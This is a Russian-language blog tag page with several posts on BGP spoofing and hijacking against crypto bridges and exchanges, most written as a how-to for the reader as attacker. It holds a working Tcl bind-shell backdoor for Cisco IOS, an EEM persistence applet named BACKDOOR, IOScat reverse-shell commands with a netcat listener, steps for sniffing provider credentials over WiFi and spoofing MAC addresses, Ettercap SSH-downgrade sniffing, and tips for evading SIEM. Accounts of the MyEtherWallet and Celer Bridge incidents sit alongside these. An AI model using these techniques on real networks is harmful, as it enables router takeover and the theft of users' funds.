Работа в Стамбуле

Метка: нелегальный майнинг

  • BGP спуфинг и опустошение криптомоста

    BGP спуфинг и опустошение криптомоста

    Как bgp атаки с подменой маршрута ставят под угрозу криптовалютные системы

    BGP спуфинг и уязвимости криптомостов — это серьёзные проблемы, с которыми сталкивается современная интернет-инфраструктура и криптоиндустрия. Как мне рассказал один хороший знакомый, ему недавно удалось таки успешно осуществить вброс маршрута обхода криптоканала при помощи bgp sppofing и bgp hijacking, используя недостатки WiFi-инфраструктуры, которые, наверняка, присутствуют с сетях провайдеров и твоего города тоже.

    Что такое BGP и причём тут криптовалютный обменник?

    Протокол граничного шлюза (BGP) — это ключевая технология, обеспечивающая маршрутизацию данных между различными сетями в интернете. Он определяет, какие маршруты между сетями предпочтительнее, и помогает направлять трафик через сложную систему соединений. Однако BGP не имеет механизмов аутентификации, что делает его уязвимым для различного рода нарушителей.

    BGP спуфинг

    BGP спуфинг — это тип нарушений сетевой связанности, при которой нарушитель вбрасывает в сеть информацию, предназначаемую BGP роутеру, чтобы перехватить или изменить маршруты интернет-трафика. Нарушители могут «объявлять» о существовании маршрутов, которые на самом деле не принадлежат их сети. Это позволяет осуществлять mitm на майнинг, процессинг крипты, перехватывать данные транзакций и закрытых ключей, перенаправлять трафик на свои крипто каналы или мосты или вообще блокировать доступ к определённым ресурсам.
    Такой подход может привести к потере данных о проведённых транзакциях, компрометации конфиденциальной информации, а также использованию сети для несанкционированной деятельности. Например, нарушитель может перенаправлять трафик от пользователей, желающих получить доступ к финансовым платформам, что позволяет проводить процессинг крипты, перехватывая транзакции.

    Казалось бы, сбылась твоя мечта, и теперь ты, сидя во Вкусно и Точка, вкушая третий филе о фиш можешь легко и непринужденно копаться через беспроводное соединение в опроной сети местного или магистрального телекома, расположенного через дорогу? Что ж, такое вполне возможно, потому как безопасность такого провайдера, а значит и подключенных к нему криптоканалов и крипто мостов оставляет желать лучшего. 

    Слушаем сеть и качаем крипту

    Итак, не теряя времени, можно запустить WireShark и начать мониторить периметр. Среди пакетов сразу можно увидеть SSL-рукопожатие на сайте провайдера…
    К слову, как происходит авторизация соединения: сначала клиент коннектится к незащищенной WEP/WPA-точке, затем обращается браузером на любой сайт в Сети и редиректится на страницу авторизации. Там он вводит логин и пароль учётной записи, пополняемой путем отправки SMS-сообщения на специальный номер, и после этого, по всей видимости, на роутере создается правило, позволяющее выходить в интернет.
    Так вот, после зашифрованной SSL-авторизации можно увидеть совершенно незакриптованные пароли от ВКонтакте и почты, крипто кошельков, внутреннего портала провайдера, слегка заXOR’енные пароли социальных сетей (которые легко вскрываются тем же Ufasoft Sniffer или InterCepter’ом), данные о транзакциях криптовалюты, BGP UPDATE пакеты, HELLO пакеты сервиса OSPF,  и неприличные ссылки, ведущие на порносайты (совсем уже никого не стесняются современные инженеры электросвязи… :). Зная IP и MAC-адреса, фигурирующие в периметре (а они узнаются анализом ARP-сообщений), можно легко их проспуфить.
    Итак, с помощью хорошей программы по смене МАС-адресов «MACChange» (или вручную, это уже кто как любит) изменим адрес своего беспроводного адаптера на известный нам МАС сотрудника телекома.


    MACChange в работе

    Не забудем присвоить себе его же IP адрес тоже. Затем попробуем подключиться к сети. О чудо, оказывается, сеть провайдера допускает как DHCP, так и Static адресацию. И, таким образом, можно наслаждаться и начинать деать вброс BGP UPDATE пакетов обновления маршрутной информации в магистральную сеть провайдера, потому как всё адреса роутеров и пароли bgp-сессии для этого уже были получены, кода мы использовали WireShark.

    От себя хочу добавить, что вместо WireShark для получения паролей открывающих доступ в сеть телекоммуникационного провайдера многие грамотные люди предпочитают пользоваться пакетом Aircrack-NG, он очень удобный и содержит серию различных утилит для работы с беспроводными сетями.

    Криптомосты и их уязвимости

    Криптомосты (cross-chain bridges) — это специальные приложения, позволяющие обменивать активы между различными блокчейнами. Например, если пользователь хочет обменять Bitcoin на Ethereum, криптомосты обеспечивают возможность такой транзакции, сохраняя функциональность блокчейнов. Однако из-за своей сложной структуры они становятся целью для нарушителя.
    Криптомосты взаимодействуют с несколькими блокчейнами, и если один из них уязвим, это может поставить под угрозу всю систему. Основные инциденты с криптомостами связаны с перехватом транзакций, взломом смарт-контрактов и использованием уязвимостей в криптографических алгоритмах. Недавние случаи показывают, что были украдены миллионы долларов в крипте, используя уязвимости криптомостов, что делает этот вопрос особенно актуальным для пользователей и разработчиков.

    Как BGP спуфинг угрожает криптомостам?

    BGP спуфинг может оказаться серьёзной угрозой для криптомостов. Один из сценариев заключается в том, что нарушитель может перенаправить трафик между криптомостами, перехватывая ключевые данные, такие как криптографические ключи или транзакционные записи. Это позволяет несанкционированно изменять или отменять транзакции.
    Более того, BGP hijacking может затронуть серверы, которые обеспечивают поддержку криптомостов. Например, если нарушитель получает доступ к серверам, обрабатывающим транзакции, он может подменить данные, создавая ложные транзакции или даже полностью опустошить криптомост, что приведёт к серьёзным финансовым потерям.
    Примерно именно так и льют крипту через mitm с майнинга или обменников при помощи bgp spoofing и bgp hijacking в настоящее время.
  • Перехват BGP-сессии опустошил кошельки легальных пользователей MyEtherWallet.com

    Перехват BGP-сессии опустошил кошельки легальных пользователей MyEtherWallet.com

        Один пока никому не известный специалист по процессингу btc и eth, используя протокол BGP и сценарии bgp spoofing вместе с реализацией bgp hijacking, успешно перенаправил трафик DNS-сервиса Amazon Route 53 на свой сервер в России и на несколько часов подменял настоящий сайт MyEtherWallet.com с реализацией web-кошелька криптовалюты Ethereum.

    префикс 205.251.192.0/24 объявлялся из сети eNet в сети Hurricane Electric и TDS Telecom

    На подготовленном нарушителем клоне сайта MyEtherWallet была организована фишинг-атака, которая позволила за два часа угнать 215 ETH (около 137 тысяч долларов) на кошельки дропов.

    Подстановка фиктивного маршрута была осуществлена от имени крупного американского интернет-провайдера eNet AS10297 в Колумбусе штат Огайо. После перехвата BGP-сессии и BGP-анонса все пиры eNet, среди которых такие крупнейшие операторы, как Level3, Hurricane Electric, Cogent и NTT, стали заворачивать трафик к Amazon Route 53 по заданному атакующими маршруту. Из-за фиктивного анонса BGP запросы к 5 подсетям /24 Amazon (около 1300 IP-адресов) в течение двух часов перенаправлялись на подконтрольный нарушителю сервер, размещённый в датацентре провайдера Equinix в Чикаго, на котором была организована MiTM-атака по подмене ответов DNS.

    Через подмену параметров DNS пользователи MyEtherWallet.com перенаправлялись на поддельный сайт, на котором использовался самоподписанный HTTPS-сертификат, для которого браузеры выдают предупреждение о проблемах с защищённым соединением, что не помешало в ходе грубого фишинга слить около 137 тысяч долларов на кошельки дропов (в случае аутентификации на фишинговом сайте у пользователя списывались все средства с кошелька). Примечательно, что нарушитель или как его ещё можно назвать дроповодом,  оказался очень состоятельным человеком — на одном ETH-кошельке, на который в ходе атаки перенаправлялись переводы, в настоящее время находится 24276 ETH, что составляет более 15 млн долларов США.

    Достоверно известно, что в ходе атаки была осуществлена подмена DNS для сайта MyEtherWallet.com, тем не менее могли пострадать и другие клиенты сервиса Amazon Route 53. По мнению некоторых исследователей безопасности, получение доступа к BGP-маршрутизатору крупного ISP и наличие ресурсов для обработки огромного DNS-трафика может свидетельствовать, что атака не ограничилась только MyEtherWallet (в пользу данной гипотезы также говорит непрекращающийся поток переводов на используемый в атаке ETH-кошелёк).

    получение доступа к BGP-маршрутизатору крупного ISP и наличие ресурсов для обработки огромного DNS-трафика

    По другим предположениям, имел место лишь тестовый эксперимент перед проведением более массированных атак.

  • Перехват и подмена bgp-сессии при помощи Cisco TCL

    Перехват и подмена bgp-сессии при помощи Cisco TCL

    Обычно мониторинг ситуаций, связанных с перехватом трафика через bgp затруднен и в siem очень трудно отследить что-то связанное с изменением маршрутов трафика при помощи внедрения bgp нарушителем. Поговорим немного о том, как можно использовать маршрутизатор Cisco Systems с привилегированным доступом level 15, что позволяет для реализации сценариев bgp spoofing с использованием встроенного в него функционала скриптового движка TCL.
    Вариантов изменения маршрутов (создание bgp обхода) в сети Интернет может быть несколько, однако самый простой из них — получению доступа к роутеру, а уже эту задачу можно решать различными способами и методами, мне на ум пришло несколько таких: 
    • Брутфорс пароля от интерфейса управления BGP;
    • Получение доступа посредством угона почты/аккаунта/компьютера одного из сотрудников или администраторов какого-нибудь провайдера (который рулит этим bgp роутером);
    • Поиск или эксплуатация уже существующих багов в BGP-сервере для обхода, запущенном на Linux-машине (по моему опыту, это чаще всего это Bird, Quagga (FRR) или же это будет стандартный девайс Cisco, Juniper или Huawei);
    • Получение доступа к управлению софтовым маршрутизатором BGP через сторонние сервисы, запущенные на этом же Linux-сервере;
    • «Вклинивание» в уже установленную BGP сессию между определенными узлами, но об этом мы поговорим чуточку позже, или напишите мне в личку. 
    Сейчас я опишу несколько вариантов реализации mitm bgp метода, и поверь, их использование действительно приводит к повышению прав на, якобы, защищенном маршрутизаторе под управлением Cisco IOS. Тебе это сильно пригодится для более глубокого осмысления роли bgp в криптоканалах как раз для создания своего bgp сервера для обхода и приземления нужного тебе трафика на свой мост. 

    Перехват bgp-сессии в Ростелекоме
    Tcl – это Tool Command Language, язык сценариев, часто применяемых с графической библиотекой Tk, был придуман в начале 80-х годов и из-за своей простоты продолжает повсеместно использоваться как встроенный в различные приложения; вспомним хотя бы программы expect или irc-ботов eggdrop, а также использование его как модуля к серверной части apache mod_tcl. В операционную систему Cisco IOS, используемую маршрутизаторами Cisco Systems, интерпретатор Tcl был внедрён начиная с версии IOS 12.3(2)T, что позволило реализовать в маршрутизаторах Cisco Systems функции выполнения «пользовательских» скриптов. Как наиболее часто встречаемый пример, использование IOS IVR для создания интерактивных голосовых меню в системах IP-телефонии.
    Используя функционал Tcl, мы имеем возможность работать с сокетами, в данном случае открывается некоторая перспектива использования маршрутизатора под управлением Cisco IOS для следующих действий:
    • Разработки собственного варианта «бэкдора» с целью закрепления системы и доступа к ней в обход штатных механизмов защиты;
    • Перехват bgp-сессии с подменой маршрутов или внедрением своего маршрута; 
    • Проведения сканирования портов в различных сегментах сети;
    • Проброса действующих портов на порт интерфейса, организации обратного (реверсного) доступа к удаленным устройствам;
    • Процессинг крипты через подмену маршрута bgp до криптомоста с китами и подмена смартконтрактов на этом мосте;
    • Создание bgp обхода для инфильтрации трафика на своём оборудовании;
    • Разработки вариантов скриптов для возможности перебора паролей (брутфорса) различных устройств и серверов в сети.

    Данными методами также можно воспользоваться для процессинга крипты, получив доступ к TFTP-серверу телеком провайдера, где размещены существующие активные TCL-сценарии и принудительно заменить существующий сценарий на собственный, предназначенный для реализации bgp spoofing сценария или создания bgp сервера для обхода криптомоста с последующим приземлением трафика китов на свой мост. В этом случае произойдет загрузка именно твоего сценария TCL и запуск его на граничном bgp-маршрутизаторе.

    Практикуемся

    Давай попробуем понять, как это можно реализовать с помощью удаленного шелла, который можно использовать без явной аутентификации с входом на назначенный порт по протоколу Telnet. Подобный сценарий недавно использовался в качестве задания на соревнованиях «Рускрипто CTF«.
    В первую очередь давай разберем, как работает Tcl на устройствах под управлением Cisco IOS.

    Загрузка и исполнение TCL-скрипта:

    Для первичной загрузки TCL-скриптов необходимо иметь привилегированный доступ не ниже уровня 15 enable. Скрипт Tcl необходимо загружать удаленно на маршрутизатор Cisco, для этого можно использовать такие протоколы, как TFTP, FTP, RCP, SCP. Загрузку и выполнение скрипта можно выполнять как напрямую в RAM-маршрутизатора, так и в FLASH-память c последующим его запуском с файловой системы Cisco IOS.
    Вот так выглядит загрузка скрипта во FLASH память и последующее его выполнение:
    Router# copy tftp://192.168.1.4/script.tcl flash://script.tcl
    Router# tclsh flash://script.tcl
    Загрузка скрипта непосредственно с TFTP-сервера:
    Router# tclsh tftp://192.168.1.4/script.tcl
    Ниже приведен пример TCL-скрипта, который при запуске захватывает сокет на порт TCP/2002 и связывает его с интерфейсом командной строки (EXEC). Загрузка скрипта выполняется методами, описанными выше (в приведенном примере с сервера TFTP).
    proc callback {sock addr port} { 
    fconfigure $sock -translation crlf -buffering line
    puts $sock "Cisco router admin console:" 
    puts $sock " " 
    puts -nonewline $sock "Router# "
    flush $sock
    fileevent $sock readable [list echo $sock] 


    proc echo {sock} {
    global var

    flush $sock

    if {[catch {gets $sock line}] || 
    [eof $sock]} {
    return [close $sock]
    }

    catch {exec $line} result
    if {[catch {puts $sock $result}]} {
    return [close $sock]
    }

    puts -nonewline $sock "Router# "
    flush $sock
    }

    set port 2002
    set sh [socket -server callback $port] 
    vwait var 
    close $sh
    После загрузки и последующего запуска вышеприведенного сценария появится возможность зайти в систему режим EXEC без использования учетных записей и выполнять любые команды с использованием привилегий супер-пользователя level 15.
    [ptsec@maxpatrol ~]$ telnet router 2002
    Trying 192.168.1.10...
    Connected to router.
    Escape character is '^]'.

    Cisco router admin console:

    Router#
    Далее я бы хотел рассказать о некоторых ограничениях, которые необходимо помнить при работе с Tcl на устройствах под управлением Cisco IOS. В ранних версиях Cisco IOS, включающих поддержку Tcl, скрипт продолжал свою работу даже при прерывании EXEC-сессии. В новых версиях последовало исправление, которое завершает работу скрипта при обрыве линии или по команде clear line. Этот «патч-фикс» производителя можно обойти несколькими способами:
    1. На линиях, (console 0 или vty 0 4), с которых запускается скрипт, применить команду exec-timeout 0 0, в противном случае по завершении сессии пользователя скрипт завершит свою работу.
    Router>en
    Router#conf t
    Enter configuration commands, one per line. End with CNTL/Z.
    Router(config)#line vty 0 4
    Router(config-line)#exec-timeout 0 0
    2. Производить запуск сценария с использованием апплетов EEM (Embedded Event Manager) по триггеру, которым может быть любое действие, в том числе периодический запуск по таймеру. На примере ниже показана конфигурация Cisco IOS, которая загружает скрипт с TFTP сервера после запуска маршрутизатора по истечении 20 секунд.
    Router(config)# event manager applet BACKDOOR
    Router(config-applet)# event timer countdown name Delay time 20
    Router(config-applet)# action 1.0 cli command "enable"
    Router(config-applet)# action 1.1 cli command "tclsh tftp://192.168.1.4/script.tcl"
    Router(config-applet)# action 1.2 syslog msg "Backdoor is executed"
    3. Конвертировать TCL-сцкнарий в формат политик EEM (Embedded Event Manager) и запускать их по триггеру, которым может быть любое действие, в том числе периодический запуск по таймеру.

    Готовые утилиты и сценарии bgp spoofing

    В ряде ситуаций можно использовать готовые сценарии, такие как IOScat и IOSmap, входящие в IOScat, позволяющие осуществлять проброс портов, прием и передачу файлов путем манипуляций с сокетами. Используя встроенный в Cisco IOS язык TCL, можно использовать маршрутизатор аналогично ПК с установленным приложением Netcat, предварительно загрузив скрипт TCL во flash-память маршрутизатора или через TFTP-сервер напрямую в RAM. Методика загрузки и установки TCL-скрипта на маршрутизатор описана выше.

    Примеры реализации:

    Организация бэкдора на маршрутизаторе (2002 порт):
    Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 –oe
    Организация реверсного шелла на нужный IP адрес сервера обхода bgp (порт 12345):
    Router# tclsh tftp://192.168.1.4/ioscat.tcl -ie -oa192.168.1.4 -op12345
    (на твоей машине приемником шелла выступает обычный netcat: nc -l -p 12345)
    Проброс удаленного порта на локальный порт маршрутизатора (2002):
    Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 -oa192.168.2.1 -op80
    У данного сценария есть много других примеров, например копирование файлов с использованием сокетов, имитация телнет-сессии на удаленном хосте и много других функций, которые можно посмотреть на сайте разработчика.
    Сценарий с названием IOSmap – не что иное, как попытка создать аналог сканера nmap, конечно, в урезанном функционале, но в данном случае достаточно эксклюзивным для работы в среде Cisco IOS. Функционал этого TCL-скрипта позволяет производить сканирование диапазонов IP-адресов на открытые TCP/UDP-порты, в том числе используя метод инвентаризации хостов посредством протокола ICMP.
    Рассмотрим примеры использования:
    Router>en
    Router#tclsh tftp://192.168.1.4/iosmap.tcl 192.168.1.1-5 -p20-24,80,443
    Loading iosmap.tcl from 192.168.1.4 (via FastEthernet0/0): !
    [OK - 15912 bytes]

    Loading services.list from 192.168.1.4 (via FastEthernet0/0): !
    [OK - 42121 bytes]

    Starting IOSmap 0.9 ( http://www.defaultroute.ca ) at 2002-03-01 02:59 UTC

    Free Memory on Platform = 29038388 / Memory required for this scan = 2622514

    Host 192.168.1.1 is unavailable

    Host 192.168.1.2 is unavailable

    Host 192.168.1.3 is unavailable

    Interesting ports on host 192.168.1.4
    PORT STATE SERVICE
    20/tcp closed ftp-data
    21/tcp closed ftp
    22/tcp closed ssh
    23/tcp closed telnet
    24/tcp closed priv-mail
    80/tcp open http
    443/tcp closed https

    Host 192.168.1.5 is unavailable

    Router#
    Изменение вариантов сканирования скрипта возможно путем добавления аргументов:
    -sP – только по ответу хоста;
    -sT – TCP-портов методом TCP connect;
    -sU – UDP-портов через функционал IP SLA.
    Учитывая богатые возможности языка ТСL, можно разработать множество подобных, интересных приложений для реализации их в сетевой среде на оборудовании под управлением Cisco IOS для применения в локальной вычислительной сети провайдера для реализации bgp spoofing сценариев.

    Как скрыться от SIEM

    Имея возможность запускать сценарии TCL, также интересно иметь возможность отследить их исполнение в среде Cisco IOS. Сделать это можно, подсмотрев процессы и состояние портов на маршрутизаторе, используя следующие команды маршрутизатора:
    Router#show processes cpu | i Tcl
    212 2284 17762 128 3.68% 2.88% 0.67% 162 Tcl Serv - tty16

    Router#show tcp brief all
    TCB Local Address Foreign Address (state)
    659CDABC 192.168.1.10.23 192.168.1.4.5163 ESTAB
    654485B4 *.2002 *.* LISTEN
    65CA2D04 *.80 *.* LISTEN
    Начиная с версии IOS 12.4(4)Т появилась возможность использования CPP (Control Plane Policy):
    Router#show control-plane host open-ports
    Active internet connections (servers and established)
    Prot Local Address Foreign Address Service State
    tcp *:23 *:0 Telnet LISTEN
    tcp *:23 192.168.1.4:1379 Telnet ESTABLIS
    tcp *:80 *:0 HTTP CORE LISTEN
    tcp *:1234 *:0 Tcl Serv - tty163 LISTEN

    Устройства под управлением Cisco IOS в 1999 и 2024

    Инженер электросвязи шатает BGP

    Таким образом, все поняли, что любую, даже самую защищенную провайдерскую Cisco можно захватить умело написанным и запущенным TCL-сценарием. В итоге ты получаешь шелл для манипулирования трафиком в глобальной сети Интернет для реализации нужных тебе сценариев bgp spoofing для проведения mitm с криптой со всеми вытекающими отсюда последствиями.
  • Ettercap 0.7.4 для Windows и bgp в криптоканалах

    Ettercap 0.7.4 для Windows и bgp в криптоканалах

    Ettercap NG – сетевой sniffer /interceptor/ logger для коммутируемых сетей (switched LAN). Программа использует ARP poisoning и “man-in-the-middle” методы нападения, чтобы перехватывать подключения между двумя хостами в реальном времени. Вы можете перехватить трафик между двумя хостами в сети интернет, используя MAC-based sniffing mode. Позволяет перехватывать SSH1, HTTPS и другие защищенные протоколы. В последнее время часто используется для реализации сценариев bgp spoofing при MiTM на майнинг и протокол bgp как таковой.


    Позволяет расшифровывать пароли для следующих протоколов — TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG или как это говорят на профильных площадках «Сетевой инженер шатает bgp».


    Перехват трафика Ettercap NG и как это работает?

    Ettercap NG — это мощный инструмент для перехвата сетевого трафика, который использует несколько ключевых методов для достижения своих целей:
    ARP-спуфинг. Ettercap подменяет MAC-адрес шлюза на свой собственный в ARP-таблице целевого устройства. В результате, весь трафик, предназначенный для шлюза, направляется на атакующий компьютер. Более подробно это выглядит так:
    •  Ettercap NG отправляет поддельные ARP-пакеты, утверждая, что он является шлюзом.
    •  Целевое устройство обновляет свою ARP-таблицу и начинает отправлять трафик на машну с Ettercap NG.
    •  Ettercap NG перехватывает этот трафик и может его анализировать, модифицировать или перенаправлять.
    Прозрачный прокси. Ettercap NG устанавливает себя в качестве промежуточного сервера между клиентом и сервером. Весь трафик, проходящий через это соединение, проходит через Ettercap NG.
    • Ettercap NG перехватывает соединение между клиентом и сервером.
    • Модифицирует пакеты таким образом, чтобы клиент и сервер думали, что общаются напрямую.
    • Ettercap NG может дешифровать и шифровать трафик, а также изменять его содержимое.
    Инъекция пакетов. Ettercap NG может вставлять свои собственные пакеты в сетевой трафик.
    Анализ протоколов. Ettercap NG поддерживает широкий спектр сетевых протоколов и может анализировать их содержимое.
    Фильтрация пакетов. Ettercap NG позволяет фильтровать пакеты по различным критериям, таким как IP-адрес, порт, протокол и т.д.

    Для чего используется Ettercap?

    Анализ безопасности. Для выявления уязвимостей в сетевых устройствах и приложениях.
    Перехват паролей. Для перехвата незашифрованных паролей.
    Проксирование. Для создания прозрачных прокси-серверов.
    Отладка сетевого трафика. Для отладки сетевых приложений.
    MiTM на майнинг
    Реализация bgp spoofing сценариев
    Атаки на протокол bgp
    Атаки с подменой маршрутов в зоне bgp
    BGP сервер для обхода
    BGP сценарии с подменой маршрутной информации

    с Ettercap NG методов работы всего три


    1) <a>, ARP poisoning based sniffing, применяется для сниффинга в коммутируемых локальных сетях второго уровня, а также для применения bgp spoofing сценариев класса mitm. В данном случае используется сценарий arpoison, которая модифицирует ARP-таблицы целевых хостов таким образом, что все кадры данных с выбранного source идут на твой хост с Ettercap NG, а с твоего хоста уже — на destination в пункт назначения на bgp-роутер или клиенту криптомоста, это уж как тебе будет удобнее. 

    Иными словами, с помощью этого метода сниффинга ты сможешь видеть любой траффик твоего сегмента сети за пределами каких бы то ни было ограничивающих тебя коммутаторов. Ты также сможешь реализовывать любые mitm-сценарии, ровно с той же силой, как если бы твой хост на самом деле был бы посередине двух хостов. На основе этого метода, уже с версии 0.6.7 Ettercap NG реализует перехват (dissection) паролей протоколов ssh1 и https. Можно даже сниффить пароли в ssh версии 2, если подключить фильтр (ettercap -F etter.filter.ssh), который будет спуфить версию ssh-сервера с 1.99 (openssh-0.9.6, etc) на 1.51, поддерживающую только лишь первую версию протокола ssh.
    Очевидно, что для реализации сценария arpoison, ettercap’у необходимо зафлудить сеть целой пачкой сгенерированных ARP-пакетов, и я тебе скажу больше, что на современных управляемых коммутаторах уже есть средства, отлавливающие этот сценарий. И уж конечно тебе решать, как от этого спасаться, чтобы не спалиться Можно, например, вводить ложный IP-адрес…


    2,3) <s>, IP based sniffing, <m>, MAC based sniffing, это обычный пассивный сниффинг локальной сети. Возможности такого сниффинга ограничены, хотя меня впечатлило количество поддерживаемых протоколов при относительно небольшом размере программы.
    Напихав нужные адреса в source, destination или в оба сразу (я выбрал 192.168.0.200 в качестве source), выбирай метод сниффинга (я выбрал <a>), ты попадешь в соответствующее окно:

    Графическая оболочка Ettercap NG 0.7.4

    и будешь видеть все интересующие тебя соединения. Для того, чтобы собирать пароли, делать не нужно вообще ничего =)) Наведи курсор на нужное тебе соединение: пароли будут появляться в нужной части экрана =)) Сброс паролей в лог — кнопка <l>. Нажми на кнопку <h> и ты увидишь новый диапазон возможностей, уверен, он тебя впечатлит. Убийство соединений, хайджекинг, филтеринг, etc… Что ещё нужно для перехвата bgp-сессии и реализации bgp-spoofing сценария при работе с криптоканалами и криптомостами? =) На видео более подробно поговорим про утечки маршрутов (route leaks) и к чему вообще всё это….



    ВКУСНОСТИ
    Возможности программы ettercap ng огромны, но я почти уверен, что они тебя не удовлетворят на все 100%. Ну что же, для твоих криптовалютных целей предусмотрены варианты в виде:


    1) Написания плагинов; ну тут все просто и понятно: не влезая в кишки ettercap’a, юзаешь плагинный интерфейс этой проги и делаешь нужный тебе компонент, который ты сможешь подгружать в программу всякий раз, когда тебе это нужно.


    2) Возможность bind’ить локальный порт, с которым ettercap проассоциирует нужное тебе соединение, например по 179 порту. Это очень ценное свойство программы: ты сможешь заранее реализовать нужные тебе механизмы, воспроизвести которые в реальном времени обычными средствами весьма затруднительно =)) Проще говоря, влезать в чужие IRC-приваты и материться можно и руками, но если ты захочешь впарить кому-нибудь бекдор, проспуфив http или ftp, или сообщить какому-нибудь биржевому игроку, что его акции упали в цене в четыре раза, или же подменить некий криптомост, где плавают жирные киты на время своим мостом с нужными тебе смартконтрактами, такое свойство программы может оказаться весьма и весьма кстати =))

    Ettercap NG 0.7.4 скачать

  • Celer Bridge процессинг или Amazon опять теряет контроль над своим IP-пространством из-за перехвата сессии BGP

    Celer Bridge процессинг или Amazon опять теряет контроль над своим IP-пространством из-за перехвата сессии BGP

    Поговорим о том, как три часа бездействия сетевых инженеров Amazon стоили держателям криптовалюты в $235 000.

    Amazon недавно потерял контроль над своими IP-адресами, которые он использует для предоставления облачных сервисов, и потребовалось более трех часов инженерам электросвязи, чтобы восстановить контроль над сетью. Эта ошибка позволила похитить 235 000 долларов США в криптовалюте у пользователей одного из партнёров Amazon.

    Неизвестные захватили контроль примерно над 256 IP-адресами посредством перехвата сессии BGP, используя известные уязвимости основного интернет-протокола междоменной маршрутизации в глобальной сети Интернет. BGP — это протокол, который организации, маршрутизирующие трафик, известные в сети как автономные системы, используют для взаимодействия с другими такими же сетями или системами ASN. Несмотря на свою решающую функцию по маршрутизации больших объемов данных по всему миру в режиме реального времени, BGP по-прежнему в значительной степени полагается на доверие, что позволяет сетям и системам отслеживать, какие IP-адреса по праву принадлежат каким ASN.

    Случай ошибочной идентификации

    В прошлом месяце автономная система 209243, принадлежащая британскому сетевому оператору Quickhost.uk, внезапно начала объявлять через bgp, что ее инфраструктура является подходящим и наилучшим путём для других ASN для доступа к так называемому блоку IP-адресов /24, принадлежащему AS16509, одному из как минимум трёх ASN, которыми управляет Amazon. Захваченный блок включал 44.235.216.69 IP-адрес, на котором размещен cbridge-prod2.celer.network, поддомен, отвечающий за обслуживание критического пользовательского интерфейса смарт-контрактов криптовалютной биржи Celer Bridge.
    17 августа неизвестные использовали bgp-перехват, чтобы сначала получить сертификат TLS для cbridge-prod2.celer.network, поскольку им удалось продемонстрировать центру сертификации GoGetSSL в Латвии, что они контролируют этот субдомен. Имея сертификат, неизвестные затем разместили свой собственный смарт-контракт в том же домене и ждали посещений от людей, пытающихся получить доступ к реальной странице Celer Bridge cbridge-prod2.celer.network.
    В общей сложности подставной контракт унес с 32 учетных записей биржи в общей сложности 234 866,65 долларов США, согласно отчету охранной фирмы SlowMist и отчету группы анализа угроз Coinbase.
    потери криптобиржы Celer Bridge из-за перехвата сессии BGP
    потери криптобиржы Celer Bridge из-за перехвата сессии BGP

    Что думает по этому поводу команда Coinbase

    Фишинговый контракт очень похож на официальный контракт Celer Bridge, поскольку имитирует многие его атрибуты. Для любого метода, явно не определенного в фишинговом контракте, он реализует структуру прокси, которая перенаправляет вызовы на легальный контракт Celer Bridge. Прокси-контракт уникален для каждой цепочки и настраивается при инициализации. Команда ниже иллюстрирует содержимое слота хранилища, отвечающего за конфигурацию прокси-контракта фишингового контракта:
    Хранение прокси-контракта для фишинговых смарт-контрактов
    Фишинговый контракт крадет средства пользователей двумя способами:
    • Любые токены, одобренные жертвами фишинга, удаляются с помощью специального метода с 4-байтовым значением 0x9c307de6().
    • Фишинговый контракт отменяет следующие методы, предназначенные для немедленной кражи токенов жертвы:
    • send() — используется для кражи токенов (например, USDC)
    • sendNative() — используется для кражи собственных активов (например, ETH)
    • addLiquidity() — используется для кражи токенов (например, USDC)
    • addNativeLiquidity() — используется для кражи собственных активов (например, ETH)
    Ниже приведен пример фрагмента кода, полученного методом реверс-инжиниринга, который перенаправляет активы в кошелек человека, осуществившего BGP-перехват:
    Фрагмент фишингового смарт-контракта

    Привет, Amazon? Где ваш сетевой инженер?

    Как показано в зеленых секциях в верхней части этого графика, подготовленного Дугом Мэдори из компании по мониторингу сети Kentik, мошенническое объявление BGP началось 17 августа около 19:39 UTC времени и за считанные секунды префикс распространился глобально. По неизвестным причинам объявление префикса было отозвано в 20:22 только для того, чтобы вернуться и быть отозвано еще три раза в течение следующих двух часов.
    BGP-перехват Celer Bridge
    В объявлении маршрута по BGP утверждалось, что адрес 44.235.216.0/24 исходит от AS14618, одного из других ASN Amazon, и должен быть маршрутизирован через AS20943 Quickhostuk. Новое объявление BGP, подобное этому, которое за считанные секунды заставляет весь Интернет маршрутизировать IP-адреса Amazon через Quickhostuk ASN, — это событие, которое должно было вызвать немедленное расследование со стороны облачного провайдера. По причинам, которые остаются неизвестными, Amazon не начал объявлять правильный путь для своего блока /24 до 23:07 (как указано фиолетовым цветом на графике выше), более чем через три часа после начала мошеннических объявлений маршрутной информации BGP.
    «Ключевой деталью, которая отличала бы это предупреждение от появления просто еще одного узла Amazon, было бы то, что новый восходящий поток был виден 100% точек обзора BGP», — написал Мадори в четверг. «Другими словами, этот новый префикс Amazon эксклюзивно передавался этим относительно неизвестным хостинг-провайдером. Это должно было вызвать удивление у команды Amazon NetOps».
    Представители Amazon не ответили ни на одно из трех электронных писем с просьбой прокомментировать этот пост, отправленных за последние девять дней. После публикации этого сообщения представитель Amazon заявил, что все несколько адресов назначения в запросе на комментарий были отключены, и что компания не игнорирует электронные письма.
    Представители Quickhostuk не ответили на два электронных письма с вопросом, как и откуда появились мошеннические объявления маршрутной информации BGP. 

    Подобное уже случалось ранее

    Это не первый случай, когда BGP-атака с целью перехвата IP-адресов Amazon заканчивается огромными потерями криптовалюты. В 2018 году невероятно похожее событие произошло с сервисом системы доменных имен Amazon Route 53. В результате атаки у владельцев счетов MyEtherWallet.com было украдено около 150 000 долларов США в криптовалюте. Украденная сумма, вероятно, была бы выше, если бы неизвестные получили бы доверенный браузеру TLS-сертификат вместо самописного сертификата, который требовал от жертв нажатия на предупреждение.

    После атаки 2018 года Amazon добавила более 5000 своих IP-префиксов к так называемым ROA (разрешения на происхождение маршрута), которые представляют собой общедоступные документы, в которых указывается, какие ASN имеют право объявлять какие IP-адреса. Этот шаг обеспечил некоторую защиту от RPKI (инфраструктуры открытых ключей ресурсов), которая использует цифровые сертификаты для подключения ASN к их законным IP-адресам.
    Этот анализ показывает, что для обхода защиты неизвестные в прошлом месяце добавили AS16509 и более конкретный маршрут /24 в так называемый AS-SET, индексированный в ALTDB, бесплатном реестре для автономных систем, в котором можно публиковать свои политики маршрутизации BGP.

    irrd.log-20220817.gz:31106270-ADD 96126
